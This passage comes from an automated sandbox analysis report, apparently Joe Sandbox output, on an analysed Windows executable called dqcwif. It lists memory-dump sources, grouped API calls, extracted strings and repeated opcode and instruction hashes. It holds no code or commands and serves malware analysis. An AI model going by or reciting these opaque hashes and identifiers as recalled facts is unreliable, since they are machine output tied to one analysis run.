                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                                                                          • Instruction ID: 9699ef9372640c7de950a53dd845a56a510199ded212d6b7a1ef505b97beeaff
                                                                                                          • Opcode Fuzzy Hash: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                                                                          • Instruction Fuzzy Hash: E0528E32A0964282EA34DB29D0A9AFD27A5EF07F84F154535DB5E976CBDE2CEC40C341
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                          • String ID:
                                                                                                          • API String ID: 118556049-0
                                                                                                          • Opcode ID: 03c842504c7de61de67b00940c9f69ee6dc3e6ca5c43510269113482fa0a35cf
                                                                                                          • Instruction ID: 1d75604308fba32dd70e539c8203667ce39a49fcce12061ee41146ec27ea0e65
                                                                                                          • Opcode Fuzzy Hash: 03c842504c7de61de67b00940c9f69ee6dc3e6ca5c43510269113482fa0a35cf
                                                                                                          • Instruction Fuzzy Hash: B5525A72B08A4289EB10DF69D0642FD27A1FB4AF98F504235DF1D9B7DADE39E8058350
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                                                          • Instruction ID: ede5456a81888660eb88be868c92dcea471e0210c60ff5626ed17a521b8af244
                                                                                                          • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                                                          • Instruction Fuzzy Hash: 3F426F32A0878286EB10DB29D4601ED7BA5FB86B98F604135DF5D97B9EDF39E841C700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                                          • Instruction ID: dca901bb77d6eb49083782413c04a4f695529de5e019c8155430640cfe5ccdf4
                                                                                                          • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                                          • Instruction Fuzzy Hash: 82219F33B2454586E708CF79D8666E933E5A365B08F08C13ED62B87289CF3CE905C740
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                          • Instruction ID: e57973238fe16c1148e4f3a7bf2e6564e967807d27f6e3e76d0057f9fd3fa8b6
                                                                                                          • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                          • Instruction Fuzzy Hash: 9EF049B27242954AD7A48F1CA45396977A1E708790B94803DD689C3E48DE3C94919F04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                          • Instruction ID: fbd3a4183d47e7b1befcb59a211ad1826e0de31b741051c1efac3e82ccc9c024
                                                                                                          • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                          • Instruction Fuzzy Hash: E0A0026594EC02D4E6188B08E8708F42730EB52B10F510432D20DC14EB9F3DAC84C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                          • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                          • Instruction ID: 3f26d993252364d6f83939cb7b4fd0a7ae762044d6a11d498a4144287e102022
                                                                                                          • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                                          • Instruction Fuzzy Hash: 80B17C21A0CB4295FE649B6DD8605F82761AB52F84BA44131DB0E87ADFEF3DEE458700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                          • String ID: tooltips_class32
                                                                                                          • API String ID: 698492251-1918224756
                                                                                                          • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                                          • Instruction ID: e0eaeffc0a27ca9230f848c144df26e537471d8881c604e0ccfe54c8ce48ab4a
                                                                                                          • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                                          • Instruction Fuzzy Hash: BBC13F72A08B418AE714CF69E4646ED77A0FB8AB94F500039DB5E87799CF7CE841CB04
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                          • String ID:
                                                                                                          • API String ID: 554392163-0
                                                                                                          • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                                          • Instruction ID: 3302aee0051142105d7c6eb383bef70389806fa0b16b25395efc0c11c463e581
                                                                                                          • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                                          • Instruction Fuzzy Hash: 2681E322D0865782EA718B2D94686F97792AF87F60F554231CB5DC32EEDE3DAC42C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 222038402-1459072770
                                                                                                          • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                                                          • Instruction ID: cabe870667bf068b025f551d3559bf0fdb1d0c746e39a881ec32d21bad62d4b5
                                                                                                          • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                                                          • Instruction Fuzzy Hash: C8516D25B0864246EA24EB2A95611F96391EF86FD0F448431EF1D8BB9BDF3CE902C704
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                          • API String ID: 3974292440-4258414348
                                                                                                          • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                                          • Instruction ID: a35bf566c2bbc66f32323864c3d617681ed2aa1e10612428e476179a733c0677
                                                                                                          • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                                          • Instruction Fuzzy Hash: BC12C312B1865382EE609F6D84219FD6B90AF5AF84B544535DF4DCA39BEF3DEC028314
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                          • API String ID: 2091158083-3440237614
                                                                                                          • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                          • Instruction ID: 646ba66210d14cbdd63d0c35cb5678e2ec461fe5ef4e47651e960e6c63e5fa0b
                                                                                                          • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                          • Instruction Fuzzy Hash: BE716F36618A8296E750DB59E8657ED6720FB85B94F800032EB4E87A9ECF7CD949C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$BuffCharDriveLowerType
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 1600147383-4113822522
                                                                                                          • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                          • Instruction ID: df016b4e7f8f982146574f2ef1d0e019342c0c5d55817fc86b6cb7750a028f59
                                                                                                          • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                          • Instruction Fuzzy Hash: F9818B22B14B5285FB14AB69D8612FC27A1FB56F88B544431CB0DC7A9AEF3DED46C340
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                          • API String ID: 258715311-1154884017
                                                                                                          • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                          • Instruction ID: 40ddacb4b7b503d734f5daf6660a7e6d523c4c2ac3d0fc34367e739cbb906c3b
                                                                                                          • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                          • Instruction Fuzzy Hash: 4771E732A45B5682EB65CF2994646F927A0FB4AF94F040635EE1D877DADF3CE845C300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3840717409-0
                                                                                                          • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                          • Instruction ID: 1fb66a358aece32e88780662c4859fbe93c2e72a120f468566ac37d2c58cb771
                                                                                                          • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                          • Instruction Fuzzy Hash: F2516A36B54B4586EB14CF6AE868AAD33A0FB49F99B504131DE1E83B99DF3DD805C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                                          • String ID: aut
                                                                                                          • API String ID: 130057722-3010740371
                                                                                                          • Opcode ID: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                                                                          • Instruction ID: d1c5fe3f4a355f521d644352cfe80b438e65bc836cefe278a485b7e2d771be92
                                                                                                          • Opcode Fuzzy Hash: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                                                                          • Instruction Fuzzy Hash: 7CC1333661868695EB20DF29E8616E97760FB86B88F404036EB4D87B5EDF7CDA05C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                          • String ID: tooltips_class32
                                                                                                          • API String ID: 2443926738-1918224756
                                                                                                          • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                          • Instruction ID: d2a90bd3a82cbde82beefb01e0e9616dce42c340e33b0f16f8c4eb53cb0fb078
                                                                                                          • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                          • Instruction Fuzzy Hash: E9918636A18A8586EB50CB69E4A47EC37A1EB89F84F104036DF4D87B99DF3CD845C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 4125642244-438819550
                                                                                                          • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                                          • Instruction ID: d6c9a2a1063c2b3934d9750e2d07e6e7434041ee114c0b5d6b0f200c9ece360e
